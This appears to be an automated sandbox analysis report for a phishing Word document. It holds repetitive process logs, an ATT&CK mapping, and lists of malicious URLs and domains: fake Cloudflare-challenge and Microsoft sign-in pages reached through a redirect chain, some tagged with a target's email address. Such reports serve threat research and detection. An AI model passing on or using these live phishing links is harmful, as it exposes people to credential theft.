Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Memory allocated: 25AE1800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Memory allocated: 25AF9800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Memory allocated: 25AE15A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Memory allocated: 25AE15C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Memory allocated: 25AFCD30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe	Memory allocated: 25AFCDF0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe

Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Virtualization/Sandbox Evasion	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Web Protocols	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	1 Process Injection	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	Login Hook	1 DLL Side-Loading	NTDS	12 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	5 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://timesofvartha.com/favicon.ico	100%	Avira URL Cloud	malware
https://timesofvartha.com/cloudflare-challenge/	100%	Avira URL Cloud	malware
https://sepedatua.com/158983/secure-redirect/	0%	Avira URL Cloud	safe
https://bc1qlpk73pgj3dz02nq8d9kpdxk.org/	100%	Avira URL Cloud	malware
https://bc1qv5p8dwc98n3judrczkmpkjz.com/api/v3/auth	0%	Avira URL Cloud	safe
https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/	100%	Avira URL Cloud	malware
https://bc1qcr8muz00d2v7uqg5ggulrmm.com/api/v3/auth	0%	Avira URL Cloud	safe
https://timesofvartha.com/cloudflare-challenge/#	100%	Avira URL Cloud	malware
https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#	100%	Avira URL Cloud	malware
https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect	0%	Avira URL Cloud	safe
https://timesofvartha.com/cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4	100%	Avira URL Cloud	malware
https://sepedatua.com/158983/secure-redirect	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0016.t-0009.t-msedge.net	13.107.246.44	true	false	high
sepedatua.com	103.134.152.12	true	false	high
a.nel.cloudflare.com	35.190.80.1	true	false	high
bc1qcr8muz00d2v7uqg5ggulrmm.com	188.114.96.3	true	false	high
r.neurotags.net	34.168.114.70	true	false	high
bc1qv5p8dwc98n3judrczkmpkjz.com	188.114.97.3	true	false	high
cdnjs.cloudflare.com	104.17.24.14	true	false	high
timesofvartha.com	208.91.198.81	true	true	unknown
challenges.cloudflare.com	104.18.95.41	true	false	high
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	high
www.google.com	142.250.186.164	true	false	high
bc1qlpk73pgj3dz02nq8d9kpdxk.org	154.216.17.193	true	false	high
s-part-0032.t-0009.t-msedge.net	13.107.246.60	true	false	high
aadcdn.msftauth.net	unknown	unknown	false	high
ajax.aspnetcdn.com	unknown	unknown	false	high
passwordreset.microsoftonline.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://bc1qcr8muz00d2v7uqg5ggulrmm.com/api/v3/auth	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/turnstile/v0/b/22755d9a86c9/api.js	false		high
https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#Mrettinger@dcndx.com	true		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/y1j5m/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/	false		high
https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/	false	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/turnstile/v0/api.js	false		high
https://timesofvartha.com/favicon.ico	false	Avira URL Cloud: malware	unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg	false		high
https://a.nel.cloudflare.com/report/v4?s=DPuBwHkrbUzOURU2nDSpeticQUuCzdy4a1kViVnWYmzGeTlJGGcyz9MfjL%2FNE6bZY%2Bkdoa8FwBjnxePw9uMGIhd%2FH%2FPAS54zLgrkE9%2FSwoTwd7UdAlIqo845m%2FB%2B7u%2FtJv6pwmiH%2FkA5e4Gz042TA5B3	false		high
https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect	false	Avira URL Cloud: safe	unknown
https://timesofvartha.com/cloudflare-challenge/	false	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/8e497d813cb62ff4/1731948951576/044ddceecbee23a905e087f0dcbf9c62295d312b4bb3ef95c5855d29fd2991d0/qFAA1Rd1fZGxcNU	false		high
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1	false		high
https://bc1qlpk73pgj3dz02nq8d9kpdxk.org/	false	Avira URL Cloud: malware	unknown
https://bc1qv5p8dwc98n3judrczkmpkjz.com/api/v3/auth	false	Avira URL Cloud: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=lJPJ1XU8p1%2FA3q2X1NQ8JsdII8OY3AVBqFMc19hM5ykp7KbUH4j5nzoiMgmWsaaktm8p2ZLb3I2qK6i7guV%2BtpcLiwYveLwgBWTZHN5LmDVlnDrSFprDZEVCQ2PgVJn0XbsY%2BBZ7r8guoyuhsdBZGlqm	false		high
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js	false		high
https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css	false		high
https://a.nel.cloudflare.com/report/v4?s=gDw%2B4BaRNj6fLDMnBJQh0DVuOZKsI6KZ2nJqJT03lEq4CAgXbGqP4IwTrh6Ut2Y940uAcjvtuZIcanZpU5zE%2BfxmX6iRaZ92ritWkcDsYgt54diMjH6mLCky2SxjUg%2FKCf8VZd4QwFc6kJFsAPze9CN6	false		high
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	false		high
https://sepedatua.com/158983/secure-redirect/	false	Avira URL Cloud: safe	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8e497d813cb62ff4/1731948951564/p8JSJGxodSL51Dr	false		high
https://timesofvartha.com/cloudflare-challenge/#Mrettinger@dcndx.com	false		unknown
https://timesofvartha.com/cdn-cgi/challenge-platform/h/b/rc/8e497d813cb62ff4	false	Avira URL Cloud: malware	unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8e497d813cb62ff4&lang=auto	false		high
https://a.nel.cloudflare.com/report/v4?s=J2C4pKO6cnPbHRruGHOZNcQA0VyqEiD%2Bt3nCfdaIscfNbn6pFRuEKBjZeL2WFFM51NtMomseZEz4%2Bdwlsc%2BO81oCgFXClsXY0OvqiDFWGABZgLIS%2BtY0bigb1RWBri%2BwwW7zHQr3aS69RUR%2FWddR2slU	false		high
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js	false		high
https://sepedatua.com/158983/secure-redirect	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://cdn.jsinit.directfwd.com/sk-jspark_init.php	chromecache_285.13.dr	false		high
https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#	chromecache_280.13.dr	false	Avira URL Cloud: malware	unknown
https://timesofvartha.com/cloudflare-challenge/#	chromecache_283.13.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.44	s-part-0016.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.18.94.41	unknown	United States	13335	CLOUDFLARENETUS	false
13.107.246.60	s-part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
154.216.17.193	bc1qlpk73pgj3dz02nq8d9kpdxk.org	Seychelles	135357	SKHT-ASShenzhenKatherineHengTechnologyInformationCo	false
208.91.198.81	timesofvartha.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
104.18.95.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	bc1qv5p8dwc98n3judrczkmpkjz.com	European Union	13335	CLOUDFLARENETUS	false
34.168.114.70	r.neurotags.net	United States	2686	ATGS-MMD-ASUS	false
188.114.96.3	bc1qcr8muz00d2v7uqg5ggulrmm.com	European Union	13335	CLOUDFLARENETUS	false
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
152.199.21.175	sni1gl.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
103.134.152.12	sepedatua.com	Singapore	138608	CLOUDHOST-AS-APCloudHostPteLtdSG	false

Private

IP
192.168.2.17
192.168.2.16

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1557885
Start date and time:	2024-11-18 17:54:48 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
Detection:	MAL
Classification:	mal72.phis.winDOCX@22/280@49/17
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, TextInputHost.exe
Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.89.19, 52.113.194.132, 2.22.50.131, 2.22.50.144, 192.229.221.95, 13.89.179.8, 184.28.90.27, 52.109.32.38, 52.109.32.46, 52.109.32.47, 52.109.32.39, 172.217.18.14, 216.58.206.67, 64.233.184.84, 34.104.35.123, 52.111.231.25, 52.111.231.26, 52.111.231.23, 52.111.231.24, 52.111.236.34, 52.111.236.32, 52.111.236.33, 52.111.236.35, 142.250.185.74, 142.250.181.234, 172.217.16.202, 142.250.186.74, 216.58.212.170, 172.217.18.10, 216.58.206.74, 142.250.184.234, 142.250.74.202, 142.250.184.202, 216.58.212.138, 142.250.186.138, 216.58.206.42, 142.250.186.106, 142.250.186.42, 172.217.18.106, 95.101.111.179, 95.101.111.168, 2.19.97.203, 2.19.97.171, 142.250.186.131, 23.212.88.34, 142.250.186.110, 40.126.32.6, 40.126.32.131, 40.126.32.66, 40.126.32.129, 152.199.19.160, 20.190.177.0
Excluded domains from analysis (whitelisted): fp.msedge.net, e1324.dscd.akamaiedge.net, slscr.update.microsoft.com, na.privatelink.msidentity.com, weu-azsc-000.roaming.officeapps.live.com, clientservices.googleapis.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, a1847.dscg2.akamai.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, officeclient.microsoft.com, wu-b-net.trafficmanager.net, www.bing.com, ecs.office.com, www.ppev6tm.aadg.akadns.net, fs.microsoft.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.f.prd.aadg.akadns.net, uci.cdn.office.net, aadcdn.msauth.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, nleditor.osi.office.net, edgedl.me.gvt1.com, s-0005.s-msedge.net, aadcdnoriginwus2.afd.azureedge.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, ppe.v6.aadg.privatelink.msidentity.com, europe.configsvc1.live.com.akadns.net, binaries.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: NoteID [4962398] _Secure_Document_Mrettinger-46568.docx

Source	URL
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
Screenshot	https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
